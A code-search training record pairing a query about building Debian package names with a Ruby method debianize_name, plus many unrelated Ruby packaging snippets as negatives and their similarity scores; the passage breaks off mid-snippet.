"def deregister_debian_package(pkg_name_expression, release_name, codename, exactmatch = false)\n @reprepro_lock.lock\n\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n logfile = File.join(log_dir,\"deregistration-reprepro-#{release_name}-#{codename}.log\")\n\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir\n\n if exactmatch\n cmd << \"remove\" << codename << pkg_name_expression\n else\n cmd << \"removematched\" << codename << pkg_name_expression\n end\n IO::write(logfile, \"#{cmd}\\n\", :mode => \"a\")\n Packager.info \"Remove existing package matching '#{pkg_name_expression}': #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n Packager.info \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n else\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir\n cmd << \"deleteunreferenced\"\n IO::write(logfile, \"#{cmd}\\n\", :mode => \"a\")\n system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def dcv_package\n \"nice-dcv-#{node['cluster']['dcv']['version']}-#{node['cluster']['base_os']}-#{dcv_url_arch}\"\nend",
"def StripReleaseNo(pkg_name)\n build_no_pos = Builtins.findlastof(pkg_name, \"-\") # find trailing build no.\n\n if build_no_pos != nil && Ops.greater_than(build_no_pos, 0)\n # cut off trailing build no.\n pkg_name = Builtins.substring(pkg_name, 0, build_no_pos)\n end\n\n pkg_name\n end",
"def reprepro_has_dsc?(debian_pkg_name, release_name, codename, reuseLock = false)\n @reprepro_lock.lock unless reuseLock\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n cmd = \"#{reprepro_bin} -T dsc -V -b #{reprepro_dir} list #{codename} #{debian_pkg_name}\"\n package_info = `#{cmd}`\n if !package_info.empty?\n Packager.info \"Reprepro: dsc file for #{debian_pkg_name} available for #{codename}\"\n return true\n else\n Packager.info \"Reprepro: dsc file for #{debian_pkg_name} not available for #{codename}\"\n return false\n end\n ensure\n @reprepro_lock.unlock unless reuseLock\n end\n end",
"def debian_version\n super ||\n ( version_gte?( ubuntu_version, [18,4] ) && '10' ) ||\n ( version_gte?( ubuntu_version, [15,4] ) && '8' ) ||\n ( version_gte?( ubuntu_version, [14,4] ) && '7' ) ||\n ( version_gte?( ubuntu_version, [12,4] ) && '6' )\n end",
"def key\n \"gem-package-#{name}\"\n end",
"def server_pkg_name\n platform_family?('debian') ? \"postgresql-#{new_resource.version}\" : \"postgresql#{new_resource.version.delete('.')}-server\"\n end",
"def available_version(package_name, arch = nil)\n version(package_name, arch, true, false)\n end",
"def supported_pkgs\n {\"rpm\"=>1, \"deb\"=>1}\nend",
"def get_saltstack_package_full_name(package)\n # pillar = YAML.safe_load(File.read('test/salt/pillar/windows.sls'))\n url = 'https://raw.githubusercontent.com/saltstack/salt-winrepo-ng/master/'\n files = [package + '.sls', package + '/init.sls']\n # example: package = \"7zip\"=>{\"version\"=>\"18.06.00.0\", \"refresh_minion_env_path\"=>false}\n saltstack_package_full_name = files.find do |checkme|\n ps = \"$f = (((Get-ChildItem -Path $env:LOCALAPPDATA -Filter 'salt-winrepo-ng' -Recurse -Directory).Fullname[0]) + '\\\\#{checkme.sub('/', '\\\\')}'); if (Test-Path $f -PathType Leaf) {Get-Content -Path $f}\"\n begin\n file = (open(url + checkme) & :read)\n rescue\n begin\n file = (powershell(ps).stdout)\n rescue\n next\n end\n end\n unless file.nil? || file.empty?\n candidate = file.match(/full_name: '([\\S]+).*'/).captures[0]\n end\n break candidate unless candidate.nil?\n end\n Inspec::Log.debug('[get_saltstack_package_full_name] found candidate: ' + saltstack_package_full_name)\n saltstack_package_full_name\nend",
"def dmg_package_app\n case new_resource.source\n when :direct\n ::File.basename(package_metadata[:url], '.dmg')\n else\n ::File.basename(new_resource.source.to_s, '.dmg')\n end\n end",
"def platform_shortname\n if rhel?\n if \"rocky\" == Ohai[\"platform\"]\n \"rocky\"\n else\n \"el\"\n end\n elsif suse?\n \"sles\"\n else\n Ohai[\"platform\"]\n end\n end",
"def pkg_binary; \"pacaur\" end",
"def native_release_packages\n @attributes[:native_release_packages]\n end",
"def split_name_package(fullname)\n fixing = fullname.gsub(/:/, \".\")\n split = fixing.match(/^(?:((?:\\w+\\.?)*)\\.)?(\\w+)$/) || []\n name = split[2] || \"\"\n package = split[1] || \"\"\n # downcase the first letter of each package name\n package = package.split(\".\").map {|s| s[0].downcase+s[1..-1]}.join(\".\")\n [name, package]\n end",
"def native_pkg_to_install_string(pkg)\n name = pkg[:metadata][:name]\n version = pkg[:metadata][:version]\n package_version = pkg[:metadata][:package_version]\n pkgname = \"#{name}-#{version}\"\n if package_version\n pkgname << \"-#{package_version}\"\n end\n pkgname\n end",
"def release_manifest_name\n \"#{name}-release-manifest\"\n end",
"def get_linux_distro_version_codename\n version_codename_regex = /^VERSION_CODENAME=\\W*(\\w+)\\W*/\n File.open('/etc/os-release') do |release_file|\n release_file.each do |line|\n return line.match(version_codename_regex)[1].downcase if line =~ version_codename_regex\n end\n end\n ''\n end",
"def build_product(name, final_package_prefix=nil)\n dc_name = name.downcase # Ex: 'server', 'devkit', 'moxi'\n\n act_name = dc_name\n act_name = 'membase' if dc_name == 'server'\n\n package_prefix = get_package_prefix(dc_name)\n\n case os_short()\n when 'win'\n fix_ism(\"is_#{dc_name}/#{dc_name}.ism\")\n fix_script(\"is_#{dc_name}/Script Files/Setup.Rul\", dc_name)\n sh \"\\\"#{INSTALL_SHIELD}\\\" -p is_#{dc_name}/#{dc_name}.ism\"\n package_prefix = final_package_prefix if final_package_prefix\n FileUtils.cp(Dir.glob(\"./is_#{dc_name}/PROJECT*/**/setup.exe\")[0],\n \"./is_#{dc_name}/#{package_prefix}_setup.exe\")\n else\n # For other generic unix-y platforms, do a tar'ing.\n # Here, we depend on a previous build_product_mm() step to\n # have filled the out directory with the right files.\n out_dir = get_tmp(\"#{package_prefix}\", false)\n\n if latest_only()\n suffix = 'latest'\n else\n suffix = product_version()\n end\n\n if \"#{dc_name}\" != \"devkit\"\n if is_rhel?\n # PRODUCT_VERSION looks like 0.0.0-0-g12344321-linux.i686\n # Let's put the git id as the release\n #\n familiarize = \"./RedHat/familiarize_#{act_name}.sh RedHat\" +\n \" #{File.dirname(out_dir)}/#{File.basename(out_dir)} #{PRODUCT_VERSION_PREFIX} 1\"\n hard_sh(familiarize)\n elsif is_ubuntu?\n # PRODUCT_VERSION looks like 0.0.0-0-g12344321-linux.i686\n # Let's put the git id as the release\n #\n make_bin_dist = \"./Ubuntu/make_bin_dist_#{act_name}.sh Ubuntu\" +\n \" #{File.dirname(out_dir)}/#{File.basename(out_dir)} #{PRODUCT_VERSION_PREFIX} 1\"\n hard_sh(make_bin_dist)\n end\n end\n\n if os_short() == 'sunos'\n tar = \"gtar\"\n else\n tar = \"#{bin('tar')}\"\n end\n\n print \"File.dirname(out_dir): #{File.dirname(out_dir)}\\n\"\n\n package = \"#{package_prefix}_#{suffix}.tar.gz\"\n cmd = \"#{tar} --directory #{File.dirname(out_dir)}\" +\n \" -czf #{package}\" +\n \" #{File.basename(out_dir)}\"\n hard_sh(cmd)\n\n if \"#{dc_name}\" != \"devkit\"\n if is_rhel?\n package = \"./#{package_prefix}_#{arch}_#{PRODUCT_GIT_DESCRIBE}.rpm\"\n cmd = \"rm -f #{package_prefix}_#{arch}_*.rpm\"\n hard_sh(cmd)\n\n cmd = \"cp #{package_prefix}_#{suffix}.tar.gz\" +\n \" ~/rpmbuild/SOURCES/#{package_prefix}_#{PRODUCT_VERSION_PREFIX}.tar.gz\"\n hard_sh(cmd)\n cmd = \"rpmbuild -bb RedHat/#{package_prefix}.spec.#{PRODUCT_VERSION_PREFIX}\"\n hard_sh(cmd)\n cmd = \"rm RedHat/#{package_prefix}.spec.#{PRODUCT_VERSION_PREFIX}\"\n hard_sh(cmd)\n\n cmd = \"mv ~/rpmbuild/RPMS/*/#{package_prefix}-#{PRODUCT_VERSION_PREFIX}-1.*.rpm #{package}\"\n hard_sh(cmd)\n elsif is_ubuntu?\n package = \"./#{package_prefix}_#{arch}_#{PRODUCT_GIT_DESCRIBE}.deb\"\n cmd = \"rm -f #{package_prefix}_#{arch}_*.deb\"\n hard_sh(cmd)\n\n cmd = \"mv ./Ubuntu/deb-dev/#{package_prefix}_*.deb #{package}\"\n hard_sh(cmd)\n end\n end\n\n if package\n if final_package_prefix\n package_prev = package\n package = final_package_prefix + '_' + package.split('_')[1..-1].join('_')\n cmd = \"mv #{package_prev} #{package}\"\n hard_sh(cmd)\n end\n\n hard_sh(\"md5sum #{package} > #{package}.md5\")\n end\n end\nend",
"def fully_qualified_wire_name\n return java_package\n end",
"def rpm_no_arch\n @rpm_no_arch\n end",
"def package_file\n File.join('/tmp/fpm-recipes/duo-openvpn/pkg',\n case node['platform_family']\n when 'debian'\n \"duo-openvpn_#{version}-#{revision}_amd64.deb\"\n when 'rhel'\n \"duo-openvpn-#{version}-#{revision}.x86_64.rpm\"\n end)\n end",
"def manifest_name(name, pack_type)\n name.chomp(\".#{pack_type}\")\n end",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def all_package_names\n each_autobuild_package.map(&:name)\n end",
"def is_debian?\n return !!@name.match(/^debian-.*$/)\n end",
"def package_download_url\n package_filename_url_safe = Info.release_version.gsub(\"+\", \"%2B\")\n \"https://#{Info.release_bucket}.#{Info.release_bucket_s3_endpoint}/ubuntu-focal/#{Info.package}_#{package_filename_url_safe}_amd64.deb\"\n end",
"def fully_qualified_name\n return \".#{self.package}\"\n end",
"def pkg_path\n \"pkg/#{spec.full_name}\"\n end",
"def spec_name\n \"#{full_name}.gemspec\"\n end",
"def full_name\n \"#{@name}-#{@version}\"\n end",
"def package_available?(package_name)\n refresh\n\n if @rpmdb.lookup(package_name)\n return true\n else\n if package_name =~ /^(.*)\\.(.*)$/\n pkg_name = $1\n pkg_arch = $2\n\n if matches = @rpmdb.lookup(pkg_name)\n matches.each do |m|\n return true if m.arch == pkg_arch\n end\n end\n end\n end\n\n false\n end",
"def guess_package_name(gem_name, args)\n package_name = nil\n package_name ||= guess_package_name_from_args(gem_name, args)\n package_name ||= guess_package_name_from_environment\n package_name ||= guess_package_name_from_appfile\n package_name ||= guess_package_name_from_config_files\n package_name\n end",
"def default_platform_service_name(version: installed_postgresql_major_version, source: installed_postgresql_package_source)\n if platform_family?('rhel', 'fedora', 'amazon') && source.eql?(:repo)\n \"postgresql-#{version}\"\n else\n 'postgresql'\n end\n end",
"def repository_name\n @repository_name ||= \"#{project_name}-boshrelease\"\n end",
"def type_and_version\n self.name.gsub(\"#{Licensed::Sources.name}::\", \"\")\n .gsub(/([A-Z\\d]+)([A-Z][a-z])/, \"\\\\1_\\\\2\".freeze)\n .gsub(/([a-z\\d])([A-Z])/, \"\\\\1_\\\\2\".freeze)\n .downcase\n .split(\"::\")\n end",
"def project_name\n DeliveryGolang::Helpers.project_name(node)\n end",
"def directory_name\n \n directory_name = ''\n if self.pcb_revision != ''\n directory_name = 'pcb' \n directory_name += self.pcb_prefix + '_' \n directory_name += self.pcb_number + '_'\n directory_name += self.pcb_dash_number + '_'\n directory_name += self.pcb_revision\n end\n \n return directory_name\n \n end",
"def package_ruby(pkg, options) \n # update dependencies in any case, i.e. independant if package exists or not\n deps = dependencies(pkg)\n Dir.chdir(pkg.srcdir) do\n begin\n logname = \"obs-#{pkg.name.sub(\"/\",\"-\")}\" + \"-\" + Time.now.strftime(\"%Y%m%d-%H%M%S\").to_s + \".log\"\n gem = FileList[\"pkg/*.gem\"].first\n if not gem \n Packager.info \"Debian: creating gem from package #{pkg.name}\"\n if !system(\"rake gem 2> #{File.join(OBS_LOG_DIR, logname)}\")\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name}\"\n Packager.warn \" check: #{File.expand_path(logname)}\"\n end\n end\n\n gem = FileList[\"pkg/*.gem\"].first\n\n # Make the naming of the gem consistent with the naming schema of\n # rock packages\n #\n # Make sure the gem has the fullname, e.g.\n # tools-metaruby instead of just metaruby\n gem_rename = gem.sub(basename(pkg.name), canonize(pkg.name))\n if gem != gem_rename\n Packager.info \"Debian: renaming #{gem} to #{gem_rename}\"\n FileUtils.mv gem, gem_rename\n gem = gem_rename\n end\n\n Packager.debug \"Debian: copy #{gem} to #{packaging_dir(pkg)}\"\n FileUtils.cp gem, packaging_dir(pkg)\n gem_final_path = File.join(packaging_dir(pkg), File.basename(gem))\n\n # Prepare injection of dependencies\n options[:deps] = deps\n convert_gem(gem_final_path, options)\n # register gem with the correct naming schema\n # to make sure dependency naming and gem naming are consistent\n @ruby_rock_gems << debian_name(pkg)\n rescue Exception => e\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name} -- #{e.message}\\n#{e.backtrace.join(\"\\n\")}\"\n end\n end\n end",
"def to_s\n \"#{@distro.capitalize} #{@product.gsub(/_/, ' ').capitalize} #{@version}\"\n end",
"def drop_prefix(repo)\n repo.split('-')[1].to_s.capitalize\nend",
"def get_root name\n\troot = name.dup\n\t%w{ _[^_]*bundle\n\t\t_prototype _demo _promo _game _core\n\t\t_(no_)?soundtrack(_only)? withsoundtrack _only_audio _audio _score\n\t\t_android_and_pc _android _linux _mac _windows _win _pc\n\t\t_freesong _song _remix\n\t\t_free _text _comic\n\t\t_goty _directorscut _alldlc\n\t\t_book _ebook _coloringbook _pdf _makingof _papercraft _artbook\n\t\t_excerpt _dlc _?premium _deluxe _asm}.each do |sfx|\n\t\troot.sub!(Regexp.new(sfx), '')\n\tend\n\troot.sub!(/_((vol|issue)\\d+)/, '/\\1')\n\t[\n\t\t[ /^aaaaaa_?/, 'aaaaaa' ],\n\t\t[ /^amnesia_/, 'amnesia' ],\n\t\t[ /^anomaly/, 'anomaly' ],\n\t\t[ /^bittrip/, 'bittrip' ],\n\t\t[ /^trine2_?/, 'trine2' ],\n\t\t[ /^trine_enhanced/, 'trine' ],\n\t\t[ /^kingdomrush?/, 'kingdomrush' ], # yes, there's one with a missing h\n\t\t[ /^(the)?blackwell/, 'blackwell' ],\n\t\t[ /^ftlfasterthanlight(_ae)?/, 'ftl' ],\n\t\t[ /^talisman_?/, 'talisman' ],\n\t\t[ /^catan_?/, 'catan' ],\n\t\t[ /^shadowgrounds_?/, 'shadowgrounds' ],\n\t\t[ /^theinnerworld_?/, 'theinnerworld' ],\n\t\t[ /^peteseeger_?/, 'peteseeger' ],\n\t\t[ /^tothemoon_?/, 'tothemoon' ],\n\t\t[ /^preteniousgame_?/, 'pretentiousgame' ],\n\t\t[ /^la[-_]mulana_?/, 'lamulana' ],\n\t\t[ /^oddworld_strangerswrath_?/, 'oddworld/strangerswrath'],\n\t]. each do |pair|\n\t\trx = pair.first\n\t\tbase = pair.last\n\t\troot = File.join(base, root.sub(rx,'')) if rx.match root\n\tend\n\troot.gsub!('_', '-')\n\treturn root\nend",
"def installer_filename\n if PRE_RELEASE\n \"puppet-enterprise-#{pe_version}-el-7-x86_64.tar\"\n else\n \"puppet-enterprise-#{pe_version}-el-7-x86_64.tar.gz\"\n end\nend",
"def get_pkg_extn\n node.java.version == '6' ? 'bin' : node[:java]['package']['extn']\n end",
"def full_name\n \"#{spec.name}-#{spec.version}\"\n end",
"def package(pkginfo, options = Hash.new)\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :patch_dir => nil,\n :distribution => nil, # allow to override global settings\n :architecture => nil\n\n options[:distribution] ||= target_platform.distribution_release_name\n options[:architecture] ||= target_platform.architecture\n\n debian_pkg_name = debian_name(pkginfo)\n\n if options[:force_update]\n dirname = packaging_dir(pkginfo)\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n options[:packaging_dir] = packaging_dir(pkginfo)\n options[:release_name] = rock_release_name\n\n begin\n # Set the current pkginfo to set the install directory\n # correctly\n # FIXME: needs to be refactored\n #\n @packager_lock.lock\n @current_pkg_info = pkginfo\n\n pkginfo = prepare_source_dir(pkginfo, options.merge(unknown_options))\n\n if pkginfo.build_type == :orogen || pkginfo.build_type == :cmake || pkginfo.build_type == :autotools\n package_default(pkginfo, options)\n elsif pkginfo.build_type == :ruby\n # Import bundles since they do not need to be build and\n # they do not follow the typical structure required for gem2deb\n if pkginfo.name =~ /bundles/\n package_importer(pkginfo, options)\n else\n package_ruby(pkginfo, options)\n end\n elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package\n package_importer(pkginfo, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkginfo.build_type} for #{pkginfo.name}\"\n end\n ensure\n @current_pkg_info = nil\n @packager_lock.unlock\n end\n end",
"def package_set_name(path, branch='master')\n file = dir_git(path,branch,/source\\.yml/)\n raw = raw_file_from_git(path,file[0])\n yaml = YAML.load(raw)\n yaml[\"name\"]\n end",
"def lookup(package_name)\n pkgs = @rpms[package_name]\n if pkgs\n pkgs.sort.reverse\n else\n nil\n end\n end",
"def file_name\n \"#{full_name}.gem\"\n end",
"def pkg_cmd; \"#{pkg_binary}\" end"
] | [
"0.826601",
"0.81080985",
"0.7972412",
"0.77185374",
"0.7390493",
"0.7352227",
"0.6973002",
"0.6898783",
"0.68203634",
"0.6602259",
"0.6598977",
"0.65763",
"0.64230126",
"0.64132184",
"0.6339344",
"0.63144815",
"0.6306574",
"0.62908",
"0.62867904",
"0.6243514",
"0.62379354",
"0.62008196",
"0.6189299",
"0.61730987",
"0.6118869",
"0.6051442",
"0.604249",
"0.60405827",
"0.60247356",
"0.6016534",
"0.59863126",
"0.59697556",
"0.5968167",
"0.5960249",
"0.59359246",
"0.59154195",
"0.588937",
"0.58872426",
"0.5887197",
"0.587925",
"0.5867127",
"0.5852225",
"0.58483285",
"0.58445084",
"0.5831527",
"0.5823342",
"0.5802118",
"0.5788281",
"0.57856107",
"0.571177",
"0.5658529",
"0.5643348",
"0.56269747",
"0.56167537",
"0.55965143",
"0.55664724",
"0.5514956",
"0.55101305",
"0.5504997",
"0.55049956",
"0.5501844",
"0.54947346",
"0.54899263",
"0.54827666",
"0.54814583",
"0.54670954",
"0.54496855",
"0.54402316",
"0.54379535",
"0.543231",
"0.5431677",
"0.5431677",
"0.5431677",
"0.5431677",
"0.5429006",
"0.5423906",
"0.5413957",
"0.54091406",
"0.54080087",
"0.540551",
"0.53880996",
"0.53878266",
"0.5378105",
"0.53764933",
"0.5372892",
"0.53688985",
"0.5363478",
"0.53633916",
"0.5362808",
"0.53521",
"0.535076",
"0.53474796",
"0.5336028",
"0.5329182",
"0.5319097",
"0.53172356",
"0.53146166",
"0.5294019",
"0.5292661",
"0.5287258"
] | 0.776134 | 3 |
Create a debian package name from a given plain name according to build type, release name and release_prefix setting | def debianize_name(name, build_type: :cmake, with_rock_release_prefix: true, release_name: rock_release_name)
if build_type == :ruby
if with_rock_release_prefix
rock_release_prefix(release_name) + "ruby-" + Deb.canonize(name)
else
pkg_prefix_base + "-ruby-" + Deb.canonize(name)
end
else
if with_rock_release_prefix
rock_release_prefix(release_name) + Deb.canonize(name)
else
pkg_prefix_base + "-" + Deb.canonize(name)
end
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def debian_name(pkginfo, with_rock_release_prefix = true, release_name = nil)\n if pkginfo.kind_of?(String)\n raise ArgumentError, \"method debian_name expects a PackageInfo as argument, got: #{pkginfo.class} '#{pkginfo}'\"\n end\n name = pkginfo.name\n\n debianize_name(name,\n build_type: pkginfo.build_type,\n with_rock_release_prefix: with_rock_release_prefix,\n release_name: release_name)\n end",
"def package_name(buildno=nil)\n if buildno\n buildno = Time.now.strftime(\"%H*60+%M\")\n versnum = \"#{version}.#{buildno}\"\n else\n versnum = version\n end\n\n if platform\n \"#{name}-#{versnum}-#{platform}\"\n else\n \"#{name}-#{versnum}\"\n end\n end",
"def debian_name(pkg)\n if pkg.kind_of?(Autoproj::RubyPackage)\n debian_ruby_name(pkg.name)\n else\n \"rock-\" + canonize(pkg.name)\n end\n end",
"def package_name(project)\n \"#{project.name}-#{project.version}-#{project.release}.#{@architecture}.pkg.gz\"\n end",
"def debian_meta_name(name, with_rock_release_prefix = true)\n if with_rock_release_prefix\n rock_release_prefix + \"meta-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"meta-\" + Deb.canonize(name)\n end\n end",
"def debian_ruby_name(name, with_rock_release_prefix = true, release_name = nil)\n if with_rock_release_prefix\n rock_ruby_release_prefix(release_name) + Deb.canonize(name)\n else\n \"ruby-\" + Deb.canonize(name)\n end\n end",
"def package_name\n @package_name ||=\n Pathname(\"#{cartage.final_name}.tar#{cartage.tar_compression_extension}\")\n end",
"def package_name\n if supports_ports?\n if makefile_variable_value(\"PKGNAME\", port_path) =~ /^(.+)-[^-]+$/\n $1\n else\n raise Chef::Exceptions::Package, \"Unexpected form for PKGNAME variable in #{port_path}/Makefile\"\n end\n else\n new_resource.package_name\n end\n end",
"def manifest_name(name, pack_type)\n name.chomp(\".#{pack_type}\")\n end",
"def package_name\n @version ? \"#{@name}-#{@version}\" : @name\n end",
"def package_filename\n \"#{@package.name}_#{@package.version}_#{@package.architecture}.deb\"\n end",
"def package_name\n [self.config.organization, self.config.project_name].compact.collect(&:underscore).join('-')\n end",
"def hadoop_package(name)\n return name unless hdp22?\n return name if node['platform_family'] == 'debian'\n fw = name.split('-').first\n pv = hdp_version.tr('.', '_').tr('-', '_')\n nn = \"#{fw}_#{pv}\"\n name.gsub(fw, nn)\n end",
"def full_name\n \"#{@package}.#{parameterized_name}\"\n end",
"def package_from_name\n case name.downcase\n when 'splunk' then package :splunk\n when 'universal_forwarder' then package :universal_forwarder\n else raise 'Package must be specified (:splunk or :universal_forwarder)'\n end\n end",
"def release_name\n return nil unless @data['name'] && @data['version']\n [ dashed_name, @data['version'] ].join('-')\n end",
"def rock_release_prefix(release_name = nil)\n release_name ||= rock_release_name\n if release_name\n pkg_prefix_base + \"-#{release_name}-\"\n else\n pkg_prefix_base + \"-\"\n end\n end",
"def package_name\n name = package_drop_last(slug_parts)\n name.empty? ? '_root_' : name\n end",
"def fmri_package_name\n version = project.build_version.split(/[^\\d]/)[0..2].join(\".\")\n platform = Ohai[\"platform_version\"]\n \"#{safe_base_package_name}@#{version},#{platform}-#{project.build_iteration}\"\n end",
"def build_product(name, final_package_prefix=nil)\n dc_name = name.downcase # Ex: 'server', 'devkit', 'moxi'\n\n act_name = dc_name\n act_name = 'membase' if dc_name == 'server'\n\n package_prefix = get_package_prefix(dc_name)\n\n case os_short()\n when 'win'\n fix_ism(\"is_#{dc_name}/#{dc_name}.ism\")\n fix_script(\"is_#{dc_name}/Script Files/Setup.Rul\", dc_name)\n sh \"\\\"#{INSTALL_SHIELD}\\\" -p is_#{dc_name}/#{dc_name}.ism\"\n package_prefix = final_package_prefix if final_package_prefix\n FileUtils.cp(Dir.glob(\"./is_#{dc_name}/PROJECT*/**/setup.exe\")[0],\n \"./is_#{dc_name}/#{package_prefix}_setup.exe\")\n else\n # For other generic unix-y platforms, do a tar'ing.\n # Here, we depend on a previous build_product_mm() step to\n # have filled the out directory with the right files.\n out_dir = get_tmp(\"#{package_prefix}\", false)\n\n if latest_only()\n suffix = 'latest'\n else\n suffix = product_version()\n end\n\n if \"#{dc_name}\" != \"devkit\"\n if is_rhel?\n # PRODUCT_VERSION looks like 0.0.0-0-g12344321-linux.i686\n # Let's put the git id as the release\n #\n familiarize = \"./RedHat/familiarize_#{act_name}.sh RedHat\" +\n \" #{File.dirname(out_dir)}/#{File.basename(out_dir)} #{PRODUCT_VERSION_PREFIX} 1\"\n hard_sh(familiarize)\n elsif is_ubuntu?\n # PRODUCT_VERSION looks like 0.0.0-0-g12344321-linux.i686\n # Let's put the git id as the release\n #\n make_bin_dist = \"./Ubuntu/make_bin_dist_#{act_name}.sh Ubuntu\" +\n \" #{File.dirname(out_dir)}/#{File.basename(out_dir)} #{PRODUCT_VERSION_PREFIX} 1\"\n hard_sh(make_bin_dist)\n end\n end\n\n if os_short() == 'sunos'\n tar = \"gtar\"\n else\n tar = \"#{bin('tar')}\"\n end\n\n print \"File.dirname(out_dir): #{File.dirname(out_dir)}\\n\"\n\n package = \"#{package_prefix}_#{suffix}.tar.gz\"\n cmd = \"#{tar} --directory #{File.dirname(out_dir)}\" +\n \" -czf #{package}\" +\n \" #{File.basename(out_dir)}\"\n hard_sh(cmd)\n\n if \"#{dc_name}\" != \"devkit\"\n if is_rhel?\n package = \"./#{package_prefix}_#{arch}_#{PRODUCT_GIT_DESCRIBE}.rpm\"\n cmd = \"rm -f #{package_prefix}_#{arch}_*.rpm\"\n hard_sh(cmd)\n\n cmd = \"cp #{package_prefix}_#{suffix}.tar.gz\" +\n \" ~/rpmbuild/SOURCES/#{package_prefix}_#{PRODUCT_VERSION_PREFIX}.tar.gz\"\n hard_sh(cmd)\n cmd = \"rpmbuild -bb RedHat/#{package_prefix}.spec.#{PRODUCT_VERSION_PREFIX}\"\n hard_sh(cmd)\n cmd = \"rm RedHat/#{package_prefix}.spec.#{PRODUCT_VERSION_PREFIX}\"\n hard_sh(cmd)\n\n cmd = \"mv ~/rpmbuild/RPMS/*/#{package_prefix}-#{PRODUCT_VERSION_PREFIX}-1.*.rpm #{package}\"\n hard_sh(cmd)\n elsif is_ubuntu?\n package = \"./#{package_prefix}_#{arch}_#{PRODUCT_GIT_DESCRIBE}.deb\"\n cmd = \"rm -f #{package_prefix}_#{arch}_*.deb\"\n hard_sh(cmd)\n\n cmd = \"mv ./Ubuntu/deb-dev/#{package_prefix}_*.deb #{package}\"\n hard_sh(cmd)\n end\n end\n\n if package\n if final_package_prefix\n package_prev = package\n package = final_package_prefix + '_' + package.split('_')[1..-1].join('_')\n cmd = \"mv #{package_prev} #{package}\"\n hard_sh(cmd)\n end\n\n hard_sh(\"md5sum #{package} > #{package}.md5\")\n end\n end\nend",
"def set_dpkg_package_name(name)\n dpkg_package.name name\n dpkg_package.package_name name\n end",
"def output_package(pkg_type)\n case pkg_type\n when 'makeself'\n \"#{package_name}-#{build_version}_#{iteration}.sh\"\n when 'msi'\n Packager::WindowsMsi.new(self).package_name\n when 'bff'\n \"#{package_name}.#{bff_version}.bff\"\n when 'pkgmk'\n \"#{package_name}-#{build_version}-#{iteration}.solaris\"\n when 'mac_pkg'\n Packager::MacPkg.new(self).package_name\n when 'mac_dmg'\n pkg = Packager::MacPkg.new(self)\n Packager::MacDmg.new(pkg).package_name\n else # fpm\n require \"fpm/package/#{pkg_type}\"\n pkg = FPM::Package.types[pkg_type].new\n pkg.version = build_version\n pkg.name = package_name\n pkg.iteration = iteration\n if pkg_type == 'solaris'\n pkg.to_s('NAME.FULLVERSION.ARCH.TYPE')\n else\n pkg.to_s\n end\n end\n end",
"def release_manifest_name\n \"#{name}-release-manifest\"\n end",
"def safe_base_package_name\n if project.package_name =~ /\\A[a-z0-9\\.\\+\\-]+\\z/\n project.package_name.dup\n else\n converted = project.package_name.downcase.gsub(/[^a-z0-9\\.\\+\\-]+/, \"-\")\n\n log.warn(log_key) do\n \"The `name' component of IPS package names can only include \" \\\n \"lowercase alphabetical characters (a-z), numbers (0-9), dots (.), \" \\\n \"plus signs (+), and dashes (-). Converting `#{project.package_name}' to \" \\\n \"`#{converted}'.\"\n end\n converted\n end\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil? then\n \"#{name}-#{version}\".untaint\n else\n \"#{name}-#{version}-#{platform}\".untaint\n end\n end",
"def fix_name(name)\n if name.start_with?(\"python\")\n # If the python package is called \"python-foo\" strip the \"python-\" part while\n # prepending the package name prefix.\n return [attributes[:python_package_name_prefix], name.gsub(/^python-/, \"\")].join(\"-\")\n else\n return [attributes[:python_package_name_prefix], name].join(\"-\")\n end\n end",
"def get_pkg_name(candidate_tag=nil, distro=nil)\n prod_name = self.task.prod\n\n # FIXME: stop that hardcoding... one day!\n pkg_name = self.name\n\n distro = self.task.distros[0] if distro.nil?\n\n is_scl_package = MeadSchedulerService.is_scl_package?(prod_name, self.name)\n # different naming convention for different products\n if prod_name == \"eap6\" && distro == 'el7' && is_scl_package\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n\n # Only enable scl thing for RHEL distros, aka when distro = el_\n elsif is_scl_package && distro.match(/^el/)\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n end\n pkg_name\n end",
"def package_name(val = NULL_ARG)\n @package_name = val unless val.equal?(NULL_ARG)\n @package_name.nil? ? @name : @package_name\n end",
"def native_dependency_name(name, selected_platform = nil)\n if !selected_platform\n selected_platform = @packager.target_platform\n end\n\n # Identify this rock release and its ancestors\n this_rock_release = TargetPlatform.new(@packager.rock_release_name, selected_platform.architecture)\n\n if name.is_a? String\n # Check for 'plain' name, the 'unprefixed' name and for the 'release' name\n if this_rock_release.ancestorContains(name) ||\n selected_platform.contains(name)\n # direct name match always is an os dependency\n # it can never be in a rock release\n return [name, true]\n end\n\n # try debian naming scheme for ruby\n if this_rock_release.ancestorContains(\"ruby-#{Deb.canonize(name)}\") ||\n selected_platform.contains(\"ruby-#{Deb.canonize(name)}\")\n return [\"ruby-#{Deb.canonize(name)}\", true]\n end\n\n # otherwise, ask for the ancestor that contains a rock ruby\n # package\n ancestor_release_name = this_rock_release.releasedInAncestor(\n @packager.debian_ruby_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release_name.empty?\n return 